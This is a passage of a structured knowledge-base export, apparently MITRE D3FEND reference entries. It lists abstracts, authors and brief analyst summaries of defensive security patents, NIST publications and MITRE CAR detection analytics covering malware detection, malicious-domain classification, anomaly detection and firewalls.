  • "Example techniques herein determine that a trial data stream is associated with malware ("dirty") using a local computational model (CM). The data stream can be represented by a feature vector. A control unit can receive a first, dirty feature vector (e.g., a false miss) and determine the local CM based on the first feature vector. The control unit can receive a trial feature vector representing the trial data stream. The control unit can determine that the trial data stream is dirty if a broad CM or the local CM determines that the trial feature vector is dirty. In some examples, the local CM can define a dirty region in a feature space. The control unit can determine the local CM based on the first feature vector and other clean or dirty feature vectors, e.g., a clean feature vector nearest to the first feature vector."

kb-author

  • "Sven Krasser,David Elkind, Patrick Crenshaw, Kirby James Koster"

kb-mitre-analysis

  • ""

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Malware detection using local computational models - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Malware detection using local computational models"

Usage (5)

kb-abstract

  • "A method and apparatus for detecting malicious websites is disclosed."

kb-author

  • "John Burnet MUNRO, IV; Jason Aaron Trost; Zachary Daniel HANIF"

kb-mitre-analysis

  • "This patent describes a domain classification engine on the host computer that analyzes URLs clicked by a user or entered into a web browser to visit a website. URL analysis is done by using a combination of techniques:

    * Feature extraction: A URL is analyzed against features associated with suspicious URLs such as % of longest consecutive digits in a subdomain, % of longest repeated characters in a subdomain, % of vowels in a high level domain.

    * Markov analysis: The probability of a character occurring in normal language given the preceding two characters is determined. For example, if the received URL is google.com, the probability of a 'g' occurring at the beginning of a word, the probability of an 'o' occurring after a 'g', the probability of an 'o' occurring after 'g' and 'o', and so forth will be determined. The probability of each character is then multiplied to get a probability for the whole domain name. Probabilities are determined based on a database of existing usage, such as a dictionary, or a list of known good domain names.

    * Domain names are compared against an existing dataset of known unauthorized domain names.

    A rating is developed based on the results of these techniques, and if the rating is over a set threshold, an action is taken such as blocking access or generating an alert."

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - Method and Apparatus for Detecting Malicious Websites - Endgame Inc"

kb-reference-of

kb-reference-title

  • "Method and Apparatus for Detecting Malicious Websites"

Usage (5)

kb-abstract

  • "The method and apparatus for increasing the speed at which computer viruses are detected stores initial state information concerning the file or volume which is being examined for a virus. This information is stored in a cache in a non-volatile storage medium and when files are subsequently scanned for viruses, the current state information is compared to the initial state information stored in the cache. If the initial state information differs from the current state information then the file or volume is scanned for viruses which change the state information of the file or volume. If the initial state information and current state information is the same then the file or volume is scanned for a subset of viruses which do not change the state information."

kb-author

  • "Paul D. Cozza"

kb-mitre-analysis

  • ""

kb-organization

  • "McAfee LLC"

rdfs:label

  • "Reference - Method and apparatus for increasing the speed at which computer viruses are detected - McAfee LLC"

kb-reference-of

kb-reference-title

  • "Method and apparatus for increasing the speed at which computer viruses are detected"

Usage (5)

kb-abstract

  • "A system and method for assessing the identity fraud risk of an entity's (a user's, computer process's, or device's) behavior within a computer network and then to take appropriate action. The system uses real-time machine learning for its assessment. It records the entity's log-in behavior (conditions at log-in) and behavior once logged in to create an entity profile that helps identify behavior patterns. The system compares new entity behavior with the entity profile to determine a risk score and a confidence level for the behavior. If the risk score and confidence level indicate a credible identity fraud risk at log-in, the system can require more factors of authentication before log-in succeeds. If the system detects risky behavior after log-in, it can take remedial action such as ending the entity's session, curtailing the entity's privileges, or notifying a human administrator."

kb-author

  • "Yanlin Wang; Weizhi Li"

kb-mitre-analysis

  • "This patent describes determining a confidence score to detect anomalies in user activity based on comparing a user's behavior profile with current user activity events. The following types of events are used to develop a user entity profile:

    * logon and logoff times and locations
    * starting or ending applications
    * reading or writing files
    * changing an entity's authorization
    * monitoring network traffic

    User events that deviate from the entity profile over a certain threshold trigger a remedial action."

kb-organization

  • "Idaptive LLC"

rdfs:label

  • "Reference - Method and Apparatus for Network Fraud Detection and Remediation Through Analytics - Idaptive LLC"

kb-reference-of

kb-reference-title

  • "Method and Apparatus for Network Fraud Detection and Remediation Through Analytics"

Usage (5)

kb-abstract

  • "A method and apparatus for utilizing a token which is preferably a "dumb token" to provide secure access by authorized users to a selected resource. The token stores a secret user code in machine readable form, which code is read by a token processor. The token processor also receives a time-varying value and an algorithm, both of which may be stored or generated at either the token or the token processor and preferably a secret personal identification code which may be inputted at the token, but is preferably inputted at the token processor. The secret user code, time-varying value and secret personal identification code are then algorithmically combined by the algorithm, preferably in the token processor, to generate a one-time nonpredictable code which is transmitted to a host processor. The host processor utilizes the received one-time nonpredictable code to determine if the user is authorized access to the resource and grants access to the resource if the user is determined to be authorized. The system may be modified to operate in query/response mode. The token processor may be any of a variety of available portable remote processors or may be a device such as a telephone which is equipped with card or other token reader and with processing capability."

kb-author

  • "Kenneth P. Weiss"

kb-mitre-analysis

  • ""

kb-organization

  • "Rsa Security Inc."

rdfs:label

  • "Reference - Method and apparatus for utilizing a token for resource access - Rsa Security Inc."

kb-reference-of

kb-reference-title

  • "Method and apparatus for utilizing a token for resource access"

Usage (5)

kb-abstract

  • "A method and system for detecting algorithm-generated domains (AGDs) is disclosed wherein domain names requested by an internal host are categorized or classified using curated data sets, active services (e.g. Internet services), and certainty scores to match domain names to domain names or IP addresses used by command and control servers."

kb-author

  • "James Patrick HARLACHER; Aditya Sood; Oskar Ibatullin"

kb-mitre-analysis

  • "This patent describes detecting algorithm generated domains (AGD). DNS requests and responses are analyzed by first checking whether the domain matches existing data sets that specify different types of AGDs with known characteristics, such as Evil Twin Domains, Sinkholed domains, sleeper cells, ghost domains, parked domains, and/or bulk-registered domains. In addition to comparing domains against known data sets, the following information is collected to perform analysis:

    * IP Information: checks for information known about the IP addresses returned in the DNS response, including the number of IP addresses returned, the registered owners of the IP addresses, or different IP addresses returned for the same domain (IP fluxing).
    * Domain Registration: examines the domain registration date, domain update date, domain expiration date, registrant identity, and authorized name servers associated with a specific domain name.
    * Domain Popularity: provides information on the popularity of a domain name.

    Based on analysis of these factors a score is developed; if the score is above a certain threshold, an alert is generated."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Method and system for detecting algorithm-generated domains - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting algorithm-generated domains"

Usage (5)

kb-abstract

  • "A detection engine may be implemented by receiving network traffic and processing the traffic into one or more session datasets. Sessions not initiated by an internal host may be discarded. The frequency between the communication packets from the internal host to external host may be grouped or processed into rapid-exchange instances. The number of rapid-exchange instances, the time intervals between them, and/or the rhythm and directions of the initiation of the instances may be analyzed to determine that a human actor is manually controlling the external host. In some embodiments, when it is determined that only one human actor is involved, alarm data may be generated that indicates that a network intrusion involving manual remote control has occurred or is underway."

kb-author

  • "Nicolas BEAUCHESNE; Ryan James PRENGER"

kb-mitre-analysis

  • "This patent describes detecting an external attacker taking remote control of an internal host. Detection includes identifying sessions where the external host controls the internal host in the opposite direction the session was initiated. The number of rapid-exchange communication instances (i.e, communications that occur between the two hosts with little silence gap), the time intervals between them, and/or the rhythm and direction of the instances, are analyzed to determine if an external human actor is manually controlling the internal host."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Method and system for detecting external control of compromised hosts - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting external control of compromised hosts"

Usage (5)

kb-abstract

  • "Disclosed is an improved method, system, and computer program product for identifying malicious payloads. The disclosed approach identifies potentially malicious payload exchanges which may be associated with payload injection or root-kit magic key usage.

    Some examples of data inputs:
    Information for clients and servers, such as IP address and host information
    Payloads for both clients and servers
    Amount of data being transferred
    Duration of communications
    Length of time delay between client request and server response"

kb-author

  • "Nicolas Beauchesne; John Steven Mancini"

kb-mitre-analysis

  • "Extraction of network flow data and using unsupervised machine learning to create a standard baseline. During the monitoring phase, abnormal network metadata will result in an alert."

kb-organization

  • "Vectra Networks Inc"

rdfs:label

  • "Reference - Method and system for detecting malicious payloads - Vectra Networks Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting malicious payloads"

Usage (5)

kb-abstract

  • "In embodiments of the present invention improved capabilities are described for detecting restricted content associated with retrieved content. The method and system may include receiving a client request for content, saving contextual information from the client request, presenting retrieved content in response to the client request, and presenting the contextual information from the client request, and retrieved content, to a scanning facility. The scanning facility may utilize the contextual information from the client request to aid in the detection of restricted content associated with retrieved content."

kb-author

  • "Fraser Howard; Paul Baccas; Vanja Svajcer; Benjamin John Godwood; William James McCourt"

kb-mitre-analysis

  • "This patent describes analyzing contextual information of a Uniform Resource Identifier (URI), such as source or origin of the request URI, patterns in the way the URI is delivered, and the locale of the URI. The contextual information is sent to a scanning facility which uses that information along with a blacklist of known malicious domain names, locations, patterns, etc. to block retrieved content associated with the request URI."

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Method and system for detecting restricted content associated with retrieved content - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Method and system for detecting restricted content associated with retrieved content"

Usage (5)

kb-abstract

  • "Disclosed is an improved approach for identifying suspicious administrative host activity within a network. Network traffic is examined to learn the behavior of hosts within a network. This provides an effective way of determining whether or not a host is performing suspicious activity over an administrative protocol."

kb-author

  • "Nicolas Beauchesne; Kevin Song-Kai Ni"

kb-mitre-analysis

  • "Collect network traffic metadata directed at administrative services over a period of time to establish a baseline. This baseline is then used to determine suspicious activity that falls outside of the established baseline."

kb-organization

  • "Vectra Networks Inc"

rdfs:label

  • "Reference - Method and system for detecting suspicious administrative activity - Vectra Networks Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting suspicious administrative activity"

Usage (5)

kb-abstract

  • "An approach for detecting network attacks using metadata vectors may initially involve receiving network communications or packets, extracting metadata items from the packets. The metadata items describe the communications without requiring deep content inspection of the data payload or contents. The communications may be clustered into groups using the metadata items. If a cluster exceeds a threshold, an alarm may be generated."

kb-author

  • "Nicolas BEAUCHESNE; David Lopes Pegna; Karl Lynn"

kb-mitre-analysis

  • "This patent describes detecting network threats by first passively collecting network traffic and storing it for processing. Metadata from network traffic such as packet header information or information about a session (ex. time between request/responses) is extracted. After the metadata is extracted, the data is grouped into cluster maps of matching events to track how many instances of a network communication have occurred, such as five requests sent and five responses received. Threshold limits are set on the clusters to monitor them and if a cluster grows too large (ex. ten instances of requests and responses) this can correspond to unauthorized behavior. This method might detect, for example, a network attack using malicious payloads with automated scripts, in which a bot sends replicated malicious payloads to the same destination port."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Method and system for detecting threats using metadata vectors - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting threats using metadata vectors"

Usage (5)

kb-abstract

  • "An approach for detecting network threats is disclosed, that may involve receiving network traffic, plotting the network traffic in a n-dimensional feature space to form a network map, generating a client signature at least by placing new client points in the map, setting a threshold, and generating an alarm if one or more client activity points exceed the threshold. In some embodiments, the network map and the client signature are updated using sliding windows and distance calculations."

kb-author

  • "David Lopes PEGNA; Nicolas Beauchesne"

kb-mitre-analysis

  • "This patent describes detecting network threats by first passively collecting network traffic and storing it for processing. The stored network traffic data is used to map network events to create a cluster map. Events are network activity associated with clients, servers, or control modules such as a Kerberos Domain Controller (KDC); account information; services accessed by the client; or the number of times a service is accessed. Events that exceed a threshold from a center of gravity point of a cluster are identified as suspicious activity and an alert is generated."

kb-organization

  • "Vectra Networks Inc"

rdfs:label

  • "Reference - Method and system for detecting threats using passive cluster mapping - Vectra Networks Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting threats using passive cluster mapping"

Usage (5)

kb-abstract

  • "A method of operating a security system for a computer network in which data is passed in said network as data packets, said system controlling the passage of said data packets in the network according to a security rule, where each aspect of said network controlled by said security rule has been defined, said security rule has been defined in terms of said aspects and converted into a set of filter language instructions."

kb-author

  • "Gil Shwed"

kb-mitre-analysis

  • ""

kb-organization

  • "Checkpoint Software Technologies Ltd"

rdfs:label

  • "Reference - Method for controlling computer network security - Checkpoint Software Technologies Ltd"

kb-reference-of

kb-reference-title

  • "Method for controlling computer network security"

Usage (5)

kb-abstract

  • "A user mode application component invokes the assistance of a kernel mode driver component to detect and/or remediate malicious code on a computer system. The user mode application may include code that detects, for example, spyware and computer viruses, from user mode and when appropriate takes protective action when malicious code is detected. In one aspect, when the user mode application is unable to perform a selected operation in attempting to detect and/or take protective action, the user mode application invokes a kernel mode driver for assistance. The kernel mode driver assists user mode application in detecting malicious code and/or taking protective action by enabling or otherwise performing a selected operation for the user mode application."

kb-author

  • "Adam Glick, Patrick Gardner, Pieter Viljoen"

kb-mitre-analysis

  • "This patent describes detecting registry changes using a prohibited change heuristic or a database of prohibited functions/function parameters."

kb-organization

  • "Symantec Corporation"

rdfs:label

  • "Reference - Method using kernel mode assistance for the detection and removal of threats which are actively preventing detection and removal from a running system - Symantec Corporation"

kb-reference-of

kb-reference-title

  • "Method using kernel mode assistance for the detection and removal of threats which are actively preventing detection and removal from a running system"

Usage (5)

kb-abstract

  • "This paper describes a hierarchical graph-based model that captures mission dependencies at various levels of abstraction, showing interdependencies among mission objectives, tasks, information, and cyber assets. For this work, we employ established tools within a structured methodology for cyber resiliency analysis. Our model is focused on a strategic-level military scenario defined in a formal Request for Information (RFI) to industry and research partners by the NATO Multinational Cyber Defense Capability Development (MN CD2) Work Package 2 (WP2). We enhance this scenario with additional mission and operational context, and then build a mission dependency model for the enhanced scenario. It is anticipated that our mission dependency model will be part of an upcoming demonstration of cyber defense situational awareness capabilities in a NATO Communications and Information (NCI) Agency test environment, integrated with data sources that represent the operational military environment."

kb-author

  • "William Heinbockel, Steven Noel, James Curbo"

kb-organization

  • "JHU APL"

rdfs:label

  • "Reference - Mission Dependency Modeling for Cyber Situational Awareness"

kb-reference-of

kb-reference-title

  • "Mission Dependency Modeling for Cyber Situational Awareness"

Usage (5)

kb-abstract

  • "A training system senses a user action that may expose the user to a threat, such as a cybersecurity threat. The user action may be in response to a mock attack delivered via a messaging service, a wireless communication service, a fake malware application or another device, service, system or mechanism. The system selects a training action from a collection of available training actions and causes the training action to be delivered to the user."

kb-author

  • "Norman Sadeh-Koniecpol, Kurt Wescoe, Jason Brubaker, Jason Hong"

kb-mitre-analysis

  • ""

kb-organization

  • "WOMBAT SECURITY TECHNOLOGIES Inc"

rdfs:label

  • "Reference - Mock attack cybersecurity training system and methods - WOMBAT SECURITY TECHNOLOGIES Inc"

kb-reference-of

kb-reference-title

  • "Mock attack cybersecurity training system and methods"

Usage (5)

kb-abstract

  • "Embodiments of the invention provide a method for detecting changes in behavior of authorized users of computer resources and reporting the detected changes to the relevant individuals. The method includes evaluating actions performed by each user against user behavioral models and business rules. As a result of the analysis, a subset of users may be identified and reported as having unusual or suspicious behavior. In response, the management may provide feedback indicating that the user behavior is due to the normal expected business needs or that the behavior warrants further review. The management feedback is available for use by machine learning algorithms to improve the analysis of user actions over time. Consequently, investigation of user actions regarding computer resources is facilitated and data loss is prevented more efficiently relative to the prior art approaches with only minimal disruption to the ongoing business processes."

kb-author

  • "Joseph P. Bigus, Leon Gong, Christoph Lingenfelder"

kb-mitre-analysis

  • ""

kb-organization

  • "Daedalus Group LLC (formerly IBM)"

rdfs:label

  • "Reference - Modeling user access to computer resources - Daedalus Group LLC (formerly IBM)"

kb-reference-of

kb-reference-title

  • "Modeling user access to computer resources"

Usage (5)

kb-abstract

  • "Provided are devices, computer-program products, and methods (e.g., methods implemented by a production system or security agent program or process) for providing services on a production system to mimic a deception mechanism. For example, a method can include determining a deception characteristic of a deception mechanism and determining a production characteristic of the production system. The method can further include determining an additional service or a modification of an existing service of the production system using the deception characteristic and the production characteristic. In some cases, the additional service and/or the modification can be a deterrent to potential attackers of the production system. The method can further include modifying the production system to mimic the deception mechanism, including adding the additional service to the production system or modifying the existing service using the modification."

kb-author

  • "Sreenivas Gukal, Rammohan Varadarajan"

kb-mitre-analysis

  • ""

kb-organization

  • "Acalvio Technologies Inc"

rdfs:label

  • "Reference - Modification of a Server to Mimic a Deception Mechanism - Acalvio Technologies Inc"

kb-reference-of

kb-reference-title

  • "Modification of a Server to Mimic a Deception Mechanism"

Usage (5)

kb-abstract

  • "Once security and privacy controls are implemented, they need to be evaluated for correctness and effectiveness. After the initial assessment is completed and the system enters the operations/maintenance phase of the system development life cycle, the controls are assessed on an ongoing basis according to the organization and system’s continuous monitoring plans. The ongoing assessment supports the authorizing official’s decision to continue or discontinue the system’s authorization to operate. Control effectiveness assessments are performed by an independent third-party assessor or assessment team if the system categorization is moderate or high."

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NIST RMF Quick Start Guide - Assess Step - Frequently Asked Questions (FAQ)"

kb-reference-of

kb-reference-title

  • "NIST RMF Quick Start Guide - Assess Step - Frequently Asked Questions (FAQ)"

Usage (5)

kb-abstract

  • "With the continuing frequency, intensity, and adverse consequences of cyber-attacks, disruptions, hazards, and other threats to federal, state, and local governments, the military, businesses, and the critical infrastructure, the need for trustworthy secure systems has never been more important to the long-term economic and national security interests of the United States. Engineering-based solutions are essential to managing the growing complexity, dynamicity, and interconnectedness of today’s systems, as exemplified by cyber-physical systems and systems-of-systems, including the Internet of Things. This publication addresses the engineering-driven perspective and actions necessary to develop more defensible and survivable systems, inclusive of the machine, physical, and human components that compose the systems and the capabilities and services delivered by those systems. It starts with and builds upon a set of well-established International Standards for systems and software engineering published by the International Organization for Standardization (ISO), the International Electrotechnical Commission (IEC), and the Institute of Electrical and Electronics Engineers (IEEE) and infuses systems security engineering methods, practices, and techniques into those systems and software engineering activities. The objective is to address security issues from a stakeholder protection needs, concerns, and requirements perspective and to use established engineering processes to ensure that such needs, concerns, and requirements are addressed with appropriate fidelity and rigor, early and in a sustainable manner throughout the life cycle of the system."

kb-author

  • "Ron Ross, Michael McEvilley, and Janet Carrier Oren"

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NIST Special Publication 800-160 Volume 1 - Systems Security Engineering"

kb-reference-of

kb-reference-title

  • "NIST Special Publication 800-160 Volume 1 - Systems Security Engineering"

Usage (5)

kb-abstract

  • "This publication describes the Risk Management Framework (RMF) and provides guidelines for applying the RMF to information systems and organizations. The RMF provides a disciplined, structured, and flexible process for managing security and privacy risk that includes information security categorization; control selection, implementation, and assessment; system and common control authorizations; and continuous monitoring. The RMF includes activities to prepare organizations to execute the framework at appropriate risk management levels. The RMF also promotes near real-time risk management and ongoing information system and common control authorization through the implementation of continuous monitoring processes; provides senior leaders and executives with the necessary information to make efficient, cost-effective, risk management decisions about the systems supporting their missions and business functions; and incorporates security and privacy into the system development life cycle. Executing the RMF tasks links essential risk management processes at the system level to risk management processes at the organization level. In addition, it establishes responsibility and accountability for the controls implemented within an organization’s information systems and inherited by those systems."

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NIST Special Publication 800-37 Revision 2 - Risk Management Framework for Information Systems and Organizations"

kb-reference-of

kb-reference-title

  • "NIST Special Publication 800-37 Revision 2 - Risk Management Framework for Information Systems and Organizations"

Usage (5)

kb-abstract

  • "This publication provides a methodology and set of procedures for conducting assessments of security and privacy controls employed within systems and organizations within an effective risk management framework. The assessment procedures, executed at various phases of the system development life cycle, are consistent with the security and privacy controls in NIST Special Publication 800-53, Revision 5. The procedures are customizable and can be easily tailored to provide organizations with the needed flexibility to conduct security and privacy control assessments that support organizational risk management processes and are aligned with the stated risk tolerance of the organization. Information on building effective security and privacy assessment plans is also provided with guidance on analyzing assessment results."

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NIST Special Publication 800-53A Revision 5 - Assessing Security and Privacy Controls in Information Systems and Organizations"

kb-reference-of

kb-reference-title

  • "NIST Special Publication 800-53A Revision 5 - Assessing Security and Privacy Controls in Information Systems and Organizations"

Usage (5)

kb-abstract

  • "This volume introduces concepts to support automated assessment of most of the security controls in NIST Special Publication (SP) 800-53. Referencing SP 800-53A, the controls are divided into more granular parts (determination statements) to be assessed. The parts of the control assessed by each determination statement are called control items. The control items are then grouped into the appropriate security capabilities. As suggested by SP 800-53 Revision 4, security capabilities are groups of controls that support a common purpose. For effective automated assessment, testable defect checks are defined that bridge the determination statements to the broader security capabilities to be achieved and to the SP 800-53 security control items themselves. The defect checks correspond to security sub-capabilities—called sub-capabilities because each is part of a larger capability. Capabilities and sub-capabilities are both designed with the purpose of addressing a series of attack steps. Automated assessments (in the form of defect checks) are performed using the test assessment method defined in SP 800-53A by comparing a desired and actual state (or behavior)."

kb-author

  • "Kelley Dempsey, Paul Eavy, and George Moore"

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NISTIR 8011 Volume 1 - Automation Support for Security Control Assessments"

kb-reference-of

kb-reference-title

  • "NIST Interagency Report 8011 Volume 1 - Automation Support for Security Control Assessments"

Usage (5)

kb-abstract

  • "Buffer overflow attacks continue to be a major security problem and detecting attacks of this nature is therefore crucial to network security. Signature based network based intrusion detection systems (NIDS) compare network traffic to signatures modelling suspicious or attack traffic to detect network attacks. Since detection is based on pattern matching, a signature modelling the attack must exist for the NIDS to detect it, and it is therefore only capable of detecting known attacks. This paper proposes a method to detect buffer overflow attacks by parsing the payload of network packets in search of shellcode which is the remotely executable component of a buffer overflow attack. By analysing the shellcode it is possible to determine which system calls the exploit uses, and hence the operation of the exploit. Current NIDS-based buffer overflow detection techniques mainly rely upon specific signatures for each new attack. Our approach is able to detect previously unseen buffer overflow attacks, in addition to existing ones, without the need for specific signatures for each new attack. The method has been implemented and tested for buffer overflow attacks on Linux on the Intel x86 architecture using the Snort NIDS."

kb-author

  • "Stig Andersson, Andrew Clark, and George Mohay"

kb-mitre-analysis

  • ""

kb-organization

  • "Information Security Research Centre"

rdfs:label

  • "Reference - Network-Based Buffer Overflow Detection by Exploit Code Analysis - Information Security Research Centre"

kb-reference-of

kb-reference-title

  • "Network-Based Buffer Overflow Detection by Exploit Code Analysis"

Usage (5)

kb-abstract

  • "A proxy which is part of a firewall controls exchanges of information between two application entities. The proxy interrogates attempts to establish a communication session by requesting entities with a server entity in lower layers in accordance with defined authentication procedures. The proxy interfaces with networking software to direct a communication stack to monitor connection requests to any address on specific ports. The requestor's address and the server's address are checked against an access control list. If either address is invalid, the proxy closes the connection. If both are valid, a new connection is set up such that both the requestor and server are transparently connected to the proxy with variable higher levels being connected in a relay mode. Protocol data units are interrogated for conformance to a protocol session, and optionally further decoded to add additional application specific filtering. In one embodiment, an OSI architecture comprises the levels."

kb-author

  • "Michael W Green, Ricky Ronald Kruse"

kb-mitre-analysis

  • ""

kb-organization

  • "Secure Computing LLC"

rdfs:label

  • "Reference - Network firewall with proxy - Secure Computing LLC"

kb-reference-of

kb-reference-title

  • "Network firewall with proxy"

Usage (5)

kb-abstract

  • "A system to detect attackers who attempt to breach an enterprise network and attackers who have already breached the enterprise network, including an open source intelligence (OSINT) discoverer scanning the Internet to discover data related to an enterprise that is available online, an OSINT replacer generating deceptive files by replacing placeholders within template files with deceptive information, based on the data discovered by the OSINT discoverer, an OSINT distributor planting the deceptive files generated by the OSINT replacer within designated OSINT resources, and a deception management server that alerts an administrator in response to an attacker attempting to make a connection within the network using information in a deceptive file planted by the OSINT distributor."

kb-author

  • "Hadar Yudovich; Nimrod Lavi; Sharon Bittan; Tom Kahana; Tom Sela"

kb-mitre-analysis

  • "Seems to focus on configuration-oriented files in which decoy hostnames etc. are placed and then published on Internet sites; the decoy "objects" are then monitored."

kb-organization

  • "Illusive Networks Ltd"

rdfs:label

  • "Reference - Open source intelligence deceptions - Illusive Networks Ltd"

kb-reference-of

kb-reference-title

  • "Open source intelligence deceptions"

Usage (5)

kb-author

  • "Soham Ray"

kb-organization

  • "SAP Press"

rdfs:label

  • "Reference - Organizational Management in SAP ERP HCM"

kb-reference-of

kb-reference-title

  • "Organization Mapping in SAP ERP HCM"

Usage (5)

kb-abstract

  • "Many programs create command prompts as part of their normal operation, including malware used by attackers. This analytic attempts to identify suspicious programs spawning cmd.exe by looking for programs that do not normally create cmd.exe.

    While this analytic does not take the user into account, doing so could generate further interesting results. It is very common for some programs to spawn cmd.exe as a subprocess, for example to run batch files or Windows commands. However, many processes don't routinely launch a command prompt - for example Microsoft Outlook. A command prompt being launched from a process that normally doesn't launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-002: Outlier Parents of Cmd - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-002: Outlier Parents of Cmd"

Usage (5)

kb-abstract

  • "This document provides technical guidelines and recommendations supporting resiliency of platform firmware and data against potentially destructive attacks. The platform is a collection of fundamental hardware and firmware components needed to boot and operate a system. A successful attack on platform firmware could render a system inoperable, perhaps permanently, or requiring reprogramming by the original manufacturer, resulting in significant disruptions to users. The technical guidelines in this document promote resiliency in the platform by describing security mechanisms for protecting the platform against unauthorized changes, detecting unauthorized changes that occur, and recovering from attacks rapidly and securely. Implementers, including Original Equipment Manufacturers (OEMs) and component/device suppliers, can use these guidelines to build stronger security mechanisms into platforms. System administrators, security professionals, and users can use this document to guide procurement strategies and priorities for future systems."

kb-author

  • "NIST"

kb-mitre-analysis

  • ""

kb-organization

  • "NIST"

rdfs:label

  • "Reference - Platform Firmware Resiliency Guidelines - NIST"

kb-reference-of

kb-reference-title

  • "Platform Firmware Resiliency Guidelines"

Usage (5)

kb-abstract

  • "In one aspect, a method useful for monitoring and validating execution of executable binary code, includes the step of disassembling an executable binary code of an application. The method includes the step of detecting and obtaining location and type of an application programming interface (API) call, system call, and privileged instruction that is executed by the executable binary code. The method includes the step of detecting and obtaining return address from an API call and system call. The method includes the step of validating location of the API call, system call, and privileged instruction. The method includes the step of validating return from the API call and system call."

kb-author

  • "Jayant Shukla"

kb-mitre-analysis

  • "The patent describes a technique for monitoring API calls. Executable binary code of an application is first disassembled and scanned for API calls. Based on the recorded API calls, a rule list is generated. Software hooks are placed in the code for monitoring API calls during program execution, and each API call is then validated against the generated rule list to permit or deny its execution.

    Rules are created that specify the type and location of the API call. For example, data collected for an application can show an API call to libc at address 0x43e0 and an API call by libc at address 0x1fb47. Accordingly, two rules are generated. The first rule specifies the location type and target of the API call at address 0x43e0, as well as the return address. The second rule is for the API call to the kernel and states the target address, return address, instruction, and target type."

kb-organization

  • "K2 Cyber Security Inc"

rdfs:label

  • "Reference - Post sandbox methods and systems for detecting and blocking zero-day exploits via api call validation - K2 Cyber Security Inc"

kb-reference-of

kb-reference-title

  • "Post sandbox methods and systems for detecting and blocking zero-day exploits via api call validation"

Usage (5)

kb-abstract

  • "PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus, which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts.

    Powershell can be used to hide monitored command line execution such as:

    * net use
    * sc start"

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-04-003: Powershell Execution - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-04-003: Powershell Execution"

Usage (5)

kb-abstract

  • "Various families of malware use domain generation algorithms (DGAs) to generate a large number of pseudo-random domain names to connect to a command and control (C&C) server. In order to block DGA C&C traffic, security organizations must first discover the algorithm by reverse engineering malware samples, then generate a list of domains for a given seed. The domains are then either preregistered or published in a DNS blacklist. This process is not only tedious, but can be readily circumvented by malware authors using a large number of seeds in algorithms with multivariate recurrence properties (e.g., banjori) or by using a dynamic list of seeds (e.g., bedep). Another technique to stop malware from using DGAs is to intercept DNS queries on a network and predict whether domains are DGA generated. Such a technique will alert network administrators to the presence of malware on their networks. In addition, if the predictor can also accurately predict the family of DGAs, then network administrators can also be alerted to the type of malware that is on their networks. This paper presents a DGA classifier that leverages long short-term memory (LSTM) networks to predict DGAs and their respective families without the need for a priori feature extraction. Results are significantly better than state-of-the-art techniques, providing 0.9993 area under the receiver operating characteristic curve for binary classification and a micro-averaged F1 score of 0.9906. In other terms, the LSTM technique can provide a 90% detection rate with a 1:10000 false positive (FP) rate, a twenty times FP improvement over comparable methods. Experiments in this paper are run on open datasets and code snippets are provided to reproduce the results."

kb-author

  • "Jonathan Woodbridge, Hyrum S. Anderson, Anjum Ahuja, Daniel Grant"

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - Predicting Domain Generation Algorithms with Long Short-Term Memory Networks"

kb-reference-of

kb-reference-title

  • "Predicting Domain Generation Algorithms with Long Short-Term Memory Networks"

Usage (5)

kb-abstract

  • "A method for preventing malware attacks includes the steps of detecting an attempt on an electronic device to access a task scheduler, determining an entity associated with the attempt to access the task scheduler, determining a malware status of the entity, and, based on the malware status of the entity, allowing or denying the attempted access to the task scheduler. The task scheduler is configured to launch one or more applications at a specified time or interval."

kb-author

  • "Anil Ramabhatta, Harinath Vishwanath Ramachetty, Nandi Dharma Kishore"

kb-mitre-analysis

  • "Access to a job scheduler is intercepted using hooking or file filters to identify and analyze the source files, processes, destination files, or destination servers associated with a scheduled job. The identified servers or files associated with a job are compared against an anti-malware signature database or reputation server to determine if there is a match. If so, execution is denied and an alert is generated."

kb-organization

  • "McAfee LLC"

rdfs:label

  • "Reference - Preventing execution of task scheduled malware - McAfee LLC"

kb-reference-of

kb-reference-title

  • "Preventing execution of task scheduled malware"

Usage (5)

kb-abstract

  • "In one embodiment, a method includes obtaining addresses of end hosts at a switch, the switch configured with a primary virtual local area network and a secondary virtual local area network, creating a private virtual local area network access list comprising the addresses of end hosts permitted to communicate on the secondary virtual local area network, and applying the private virtual local area network access list to interfaces connected to the end hosts permitted to communicate on the secondary virtual local area network. An apparatus is also disclosed."

kb-author

  • "Anuraag Mittal, Huei-Ping Chen"

kb-organization

  • "Cisco Technology Inc"

rdfs:label

  • "Reference - Private virtual local area network isolation - Cisco Technology Inc"

kb-reference-of

kb-reference-title

  • "Private virtual local area network isolation"

Usage (5)

kb-abstract

